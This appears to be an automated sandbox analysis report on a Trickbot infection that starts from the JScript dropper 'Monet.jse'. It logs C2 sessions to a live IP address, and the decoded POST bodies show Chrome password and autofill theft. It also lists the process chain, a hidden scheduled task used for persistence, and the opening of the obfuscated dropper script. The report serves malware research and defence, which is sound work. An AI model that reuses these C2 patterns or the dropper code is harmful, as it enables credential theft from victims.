Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.0.40	49201	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:52 UTC	6	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019AF85A User-Agent: curl/7.67.0 Content-Length: 136 Host: 5.2.78.43
2020-01-20 13:20:52 UTC	6	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:20:52 UTC	6	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 46 38 35 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 29 20 73 75 63 63 65 73 73 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 46 38 35 41 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019AF85AContent-Disposition: form-data; name="info"Grab_Passwords_Chrome() success--------Boundary019AF85A--

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.0.40	49202	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:57 UTC	7	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.0.40	49204	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:01 UTC	7	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019B1B83 User-Agent: curl/7.67.0 Content-Length: 131 Host: 5.2.78.43
2020-01-20 13:21:01 UTC	7	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:01 UTC	7	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 42 31 42 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 46 61 69 6c 65 64 20 74 6f 20 67 72 61 62 20 70 61 73 73 77 6f 72 64 73 3a 20 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 42 31 42 38 33 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019B1B83Content-Disposition: form-data; name="info"Failed to grab passwords: --------Boundary019B1B83--

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.0.40	49205	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:04 UTC	7	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary015FEE5B User-Agent: curl/7.67.0 Content-Length: 160 Host: 5.2.78.43
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 45 35 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 53 75 63 63 65 73 73 66 75 6c 6c 79 20 73 65 6e 74 20 61 75 74 6f 66 69 6c 6c 20 64 61 74 61 20 74 6f 20 44 50 6f 73 74 20 73 65 72 76 65 72 3a 20 43 68 72 6f 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 45 35 42 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary015FEE5BContent-Disposition: form-data; name="info"Successfully sent autofill data to DPost server: Chrome--------Boundary015FEE5B--
2020-01-20 13:21:09 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:21:08 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:21:09 UTC	10	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.0.40	49207	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:04 UTC	8	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary015FEF06 User-Agent: curl/7.67.0 Content-Length: 131 Host: 5.2.78.43
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 46 61 69 6c 65 64 20 74 6f 20 67 72 61 62 20 70 61 73 73 77 6f 72 64 73 3a 20 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary015FEF06Content-Disposition: form-data; name="info"Failed to grab passwords: --------Boundary015FEF06--
2020-01-20 13:21:09 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:21:08 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:21:09 UTC	9	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.0.40	49206	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:04 UTC	8	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary015FEF06 User-Agent: curl/7.67.0 Content-Length: 136 Host: 5.2.78.43
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:04 UTC	8	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 29 20 73 75 63 63 65 73 73 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary015FEF06Content-Disposition: form-data; name="info"Grab_Passwords_Chrome() success--------Boundary015FEF06--
2020-01-20 13:21:09 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:21:08 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:21:09 UTC	9	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.0.40	49208	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:04 UTC	8	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary015FEF06 User-Agent: curl/7.67.0 Content-Length: 129 Host: 5.2.78.43
2020-01-20 13:21:04 UTC	9	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:04 UTC	9	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 32 29 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 45 46 30 36 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary015FEF06Content-Disposition: form-data; name="info"Grab_Passwords_Chrome(2)--------Boundary015FEF06--

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.0.40	49209	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:21:07 UTC	9	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary015FFA1D User-Agent: curl/7.67.0 Content-Length: 141 Host: 5.2.78.43
2020-01-20 13:21:07 UTC	9	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:21:07 UTC	9	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 46 41 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 57 69 6e 73 63 70 3a 20 66 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 72 65 67 69 73 74 72 79 20 68 69 76 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 35 46 46 41 31 44 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary015FFA1DContent-Disposition: form-data; name="info"Winscp: failed to open registry hive--------Boundary015FFA1D--

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.0.40	49190	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:19:18 UTC	0	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/0/Windows%207%20x64%20SP1/1083/84.17.52.62/217C05512A13BF0D1975043DC440D43A0AD4D5BF9D7809375E0491B975D5B4A3/nfYREqCrC5seZ7lm5k4Fqwmud/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:19:25 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:19:24 GMT Content-Type: text/plain Content-Length: 1125 Connection: close
2020-01-20 13:19:25 UTC	1	IN	Data Raw: 2f 31 2f 72 65 64 34 2f 31 34 31 37 30 30 5f 57 36 31 37 36 30 31 2e 38 42 38 30 36 44 45 39 39 31 44 34 33 41 45 32 36 44 36 46 39 31 45 38 41 44 32 36 35 38 38 44 2f 6e 66 59 52 45 71 43 72 43 35 73 65 5a 37 6c 6d 35 6b 34 46 71 77 6d 75 64 2f 31 30 32 34 2f 0d 0a ee 2c 1e 0b 2e 74 95 0a 5a 07 50 21 74 51 0b 5f b8 19 f2 0d 1f b1 6c ab c7 e0 e9 bb 51 d5 20 e2 61 52 bd d3 51 fa 4d c2 c7 ec 0d f0 3c 9f c6 dd 1e 7d fb 7b 88 95 1c c9 0e e4 16 1f 51 e4 23 da c2 9f eb a1 77 44 4b c0 59 cd 1a cb c8 75 7a 20 d0 f1 c9 2f ed 64 2e 7e 76 af 9d 93 b3 fd c7 2a 4a 67 30 5f 12 ac 24 da 7f 64 a5 5d 4f e4 69 47 8a d0 56 bf 52 ac 3c 92 25 e9 c1 1c 93 f8 17 84 81 4a ae d5 6d 31 29 a3 ac 2f 73 42 9c 80 ce c6 3c 3e 29 78 19 ec 3c f3 96 b4 09 19 27 b5 b7 d4 ea 6c 2a 3d 98 d8 Data Ascii: /1/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/nfYREqCrC5seZ7lm5k4Fqwmud/1024/,.tZP!tQ_lQ aRQM<}{Q#wDKYuz /d.~vJg0_$d]OiGVR<%Jm1)/sB<>)x<'l=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.0.40	49191	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:19:25 UTC	2	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/user/SYSTEM/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:19:30 UTC	2	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:19:29 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:19:30 UTC	2	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.0.40	49192	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:19:30 UTC	2	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:19:36 UTC	2	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:19:35 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:19:36 UTC	2	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.0.40	49194	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:36 UTC	2	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:20:40 UTC	3	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:38 GMT Content-Type: application/octet-stream Content-Length: 1136 Connection: close
2020-01-20 13:20:40 UTC	3	IN	Data Raw: 8c 13 4d be 03 09 a0 4c b3 da e7 17 e2 90 f6 f5 a6 54 fc 75 44 0a 1e 04 f6 a6 53 ae c3 a4 3a a1 04 f2 60 1e ab 54 d7 8e 3c f6 20 e9 b5 cc a3 ff 41 c2 69 fd 23 90 00 c7 0f 62 8c fe 13 e6 b2 29 6a 14 66 3c 39 1c b7 15 3d 42 55 1c 33 6e ff 93 53 2b 22 d1 61 f5 55 3e 94 ee 5b 95 e6 16 93 14 94 ac 65 6c ff 01 a0 d8 2a 03 28 f3 19 24 fd a5 fc ed 0e af 42 f2 d2 6e b2 ca e4 12 58 05 78 50 d5 63 aa 3a f7 12 5c 8a 52 b6 94 ab 98 f8 43 1d 59 1f d9 fe 80 1a bd e4 5b 59 18 8f 58 69 68 3b 1a a1 69 42 c3 1b 48 29 7a 9d d3 e4 18 53 36 77 33 c7 8f b5 cb 59 47 2e f3 d8 7d 38 e2 2b 74 d6 32 5f 44 fc 4d e5 64 db e7 3f fb 35 91 20 1d 68 5b b4 71 15 9b 4a 52 75 3a 29 95 18 90 7d e1 3e 4b 56 ed f7 d1 66 b8 2e e2 7e 0b a9 7f 4b dc 98 d6 df 34 6a ec 1b 9f 78 19 66 08 ea f9 4c 15 Data Ascii: MLTuDS:`T< Ai#b)jf<9=BU3nS+"aU>[el*($BnXxPc:\RCY[YXih;iBH)zS6w3YG.}8+t2_DMd?5 h[qJRu:)}>KVf.~K4jxfL

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.0.40	49195	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:37 UTC	3	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019ABD5D User-Agent: curl/7.67.0 Content-Length: 141 Host: 5.2.78.43
2020-01-20 13:20:37 UTC	3	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:20:37 UTC	3	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 42 44 35 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 50 57 67 72 61 62 62 65 72 20 62 75 69 6c 64 20 4a 61 6e 20 31 36 20 32 30 32 30 20 31 30 3a 33 32 3a 32 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 42 44 35 44 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019ABD5DContent-Disposition: form-data; name="info"PWgrabber build Jan 16 2020 10:32:28--------Boundary019ABD5D--
2020-01-20 13:20:41 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:40 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:20:41 UTC	4	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.0.40	49196	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:40 UTC	4	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/10/62/GDFUKAPEGYZAQTQ/1/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:20:42 UTC	4	IN	HTTP/1.1 403 Forbidden Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:41 GMT Content-Length: 9 Connection: close
2020-01-20 13:20:42 UTC	5	IN	Data Raw: 46 6f 72 62 69 64 64 65 6e Data Ascii: Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.0.40	49197	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:42 UTC	5	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/1/P9VEk5oK3B7qmh1wSz/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:20:55 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:54 GMT Content-Type: text/plain Content-Length: 115 Connection: close
2020-01-20 13:20:55 UTC	7	IN	Data Raw: 2f 36 32 2f 72 65 64 34 2f 31 34 31 37 30 30 5f 57 36 31 37 36 30 31 2e 38 42 38 30 36 44 45 39 39 31 44 34 33 41 45 32 36 44 36 46 39 31 45 38 41 44 32 36 35 38 38 44 2f 50 39 56 45 6b 35 6f 4b 33 42 37 71 6d 68 31 77 53 7a 2f 39 31 33 32 33 34 37 35 2f 0d 0a 6e 65 74 77 6f 72 6b 44 6c 6c 20 73 74 61 72 74 0d 0a 31 32 33 34 35 36 37 38 39 30 Data Ascii: /62/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/P9VEk5oK3B7qmh1wSz/91323475/networkDll start1234567890

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.0.40	49198	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:43 UTC	5	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019AD502 User-Agent: curl/7.67.0 Content-Length: 129 Host: 5.2.78.43
2020-01-20 13:20:43 UTC	5	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:20:43 UTC	5	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 44 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 30 29 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 44 35 30 32 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019AD502Content-Disposition: form-data; name="info"Grab_Passwords_Chrome(0)--------Boundary019AD502--
2020-01-20 13:20:54 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:53 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:20:54 UTC	6	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 3400 Parent PID: 1696

General

Start time:	14:12:36
Start date:	20/01/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\Monet.jse' 578
Imagebase:	0xff490000
File size:	168960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 3692 Parent PID: 3400

General

Start time:	14:13:54
Start date:	20/01/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Imagebase:	0xff490000
File size:	168960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 431846743.exe PID: 3116 Parent PID: 3692

General

Start time:	14:15:08
Start date:	20/01/2020
Path:	C:\Users\user\AppData\Local\Temp\431846743.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\431846743.exe'
Imagebase:	0x400000
File size:	237590 bytes
MD5 hash:	2EA93B2945CCF91D29B4FAACC582174A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3172 Parent PID: 3116

General

Start time:	14:15:10
Start date:	20/01/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xff440000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 3388 Parent PID: 936

General

Start time:	14:16:01
Start date:	20/01/2020
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {09EF86CB-0344-4609-A443-6612E4A0A019} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase:	0xff870000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 231824723.exe PID: 3088 Parent PID: 3388

General

Start time:	14:16:01
Start date:	20/01/2020
Path:	C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Imagebase:	0x400000
File size:	237590 bytes
MD5 hash:	2EA93B2945CCF91D29B4FAACC582174A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 284 Parent PID: 3088

General

Start time:	14:16:02
Start date:	20/01/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xff440000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Trickbot_1, Description: Yara detected Trickbot, Source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 231824723.exe PID: 3040 Parent PID: 3388

General

Start time:	14:16:41
Start date:	20/01/2020
Path:	C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Imagebase:	0x400000
File size:	237590 bytes
MD5 hash:	2EA93B2945CCF91D29B4FAACC582174A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3940 Parent PID: 3040

General

Start time:	14:16:42
Start date:	20/01/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xff440000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2980 Parent PID: 284

General

Start time:	14:21:19
Start date:	20/01/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe
Imagebase:	0xff440000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4072 Parent PID: 284

General

Start time:	14:21:43
Start date:	20/01/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe
Imagebase:	0xff440000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Script:

Code
0	try
1	{
2	fr244 ( );
3	}
4	catch ( wifcrgive84ko )
5	{
6	}
7	;
8	try
9	{
10	fr447 ( "\x01" );
11	}
12	catch ( wifcrlooked90ko )
13	{
14	}
15	;
16	try
17	{
18	fr438 ( "" );
19	}
20	catch ( wifcrinsult11ko )
21	{
22	}
23	;
24	try
25	{
26	fr130 ( "" );
27	}
28	catch ( wifcrmanners44ko )
29	{
30	}
31	;
32	try
33	{
34	fr718 ( );
35	}
36	catch ( wifcroldshoes98ko )
37	{
38	}
39	;
40	try
41	{
42	fr607 ( );
43	}
44	catch ( wifcrsharp40ko )
45	{
46	}
47	;
48	try
49	{
50	fr177 ( );
51	}
52	catch ( wifcrtemperat99ko )
53	{
54	}
55	;
56	try
57	{
58	fr334 ( );
59	}
60	catch ( wifcrBeth62ko )
61	{
62	}
63	;
64	try
65	{
66	fr21 ( );
67	}
68	catch ( wifcrhairwas91ko )
69	{
70	}
71	;
72	try
73	{
74	fr354 ( );
75	}
76	catch ( wifcrwith75ko )
77	{
78	}
79	;
80	try
81	{
82	fr679 ( );
83	}
84	catch ( wifcryoullgrow1ko )
85	{
86	}
87	;
88	try
89	{
90	fr710 ( );
91	}
92	catch ( wifcrchildren7ko )
93	{
94	}
95	;
96	try
97	{
98	fr463 ( );
99	}
100	catch ( wifcrbooks17ko )
101	{
102	}
103	;
104	try
105	{
106	fr28 ( );
107	}
108	catch ( wifcrbookworm31ko )
109	{
110	}
111	;
112	try
113	{
114	fr766 ( );
115	}
116	catch ( wifcrBethI50ko )
117	{
118	}
119	;
120	try
121	{
122	fr509 ( );
123	}
124	catch ( wifcrfiercefunny31ko )
125	{
126	}
127	;
128	try
129	{
